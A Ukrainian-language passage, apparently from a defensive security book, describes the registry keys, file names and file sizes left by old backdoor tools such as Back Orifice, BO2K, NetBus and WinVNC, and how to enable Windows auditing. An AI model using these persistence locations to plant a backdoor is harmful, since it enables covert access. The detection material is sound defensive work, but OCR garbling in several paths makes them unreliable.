Зломщикам було б нецікавий створювати "потайний хід", якби після звичайного перезавантаження системи або після видалення адміністратором якої-небудь необхідної служби, вони не мали б можливості відновити з'єднання. Це можна забезпечити, помістивши в основних конфігураційних файлах або в системному реєстрі посилання на засоби створення "потайного ходу". Фактично для функціонування багато із згаданих програм потрібна наявність в системному реєстрі певних параметрів, що значно полегшує їх ідентифікацію і видалення.
Програма Back Orifice додає запис в поддерево системного реєстру Hkey_local_machine\software\ Microsoft\windows\currentversion\runservices\. При установці за умовчанням в системному реєстрі параметру (Default) привласнюється значення " .ехе" ([пропуск] .ехе), що є прийнятим за умовчанням ім'ям виконуваного файлу сервера В, поміщеного в каталог C:\windows\system. При установці пакету Во2к виконуваний файл перейменовується в Umgr32 .ехе і в системі Win 9x копіюється в каталог З: \windows\system. а в Nt/2000 — в каталог З: \winnt\system32. Звичайно ж, зломщик може змінити ці параметри на свій розсуд. Якщо які-небудь параметри системного реєстру посилаються на файл розміром близько 124,928 байт, то існує вірогідність, що це файл В. Файл Во2к має розмір 114,688 байт. 
Остання версія програми Netbus додає декілька параметрів в поддерево Hkey_local_machlne\software\net Solutions\netbus Server, проте самий важ-ний ключ створюється в Hkey_local_machlne\software\ Microsoft\windows\currentversionxrun. Він посилається на виконуваний файл сервера (у раніших версіях за умовчанням цей файл називається Sysedit, але зломщик може його змінити).
Пакет WINVNC створює ключ Hkey_users\ .DEFAULT\Software\ORL\winVNC3.
У системі UNIX небезпечні демони потрібно шукати в різних файлах rс, а також у файлі /etc/inetd.conf.

Аудит, перевірка облікових записів і ведення журналів реєстрації

Це остання по порядку, але не по ступеню важливості, контрзахід, оскільки неможливо ідентифікувати вторгнення, якщо не активізовані засоби сповіщення. Переконаєтеся, що підключені вбудовані можливості аудиту. Наприклад, в NT політикові аудиту можна набудувати за допомогою диспетчера користувачів, а в 2000 — з використанням аплета Security Policy. To же саме можна здійснити за допомогою утиліти auditpol з набору NTRK. Файлова система NTFS дозволяє відстежувати доступ на рівні окремих файлів. Для цього у вікні провідника Windows клацніть правою кнопкою миші на необхідній теці або на файлі, виберіть команду Properties, перейдіть у вкладку Security, клацніть на кнопці Auditing і набудуйте потрібні параметри.

Відомо, що в системі Nt4 ведення повного аудиту призводить до зниження продуктивності, тому багато хто не користувався цією можливістю. Проте тестування Windows 2000 показало, що в цій операційній системі в режимі аудиту споживання ресурсів значно понижене і уповільнення її роботи невідчутно навіть при використанні всіх можливостей, що надаються.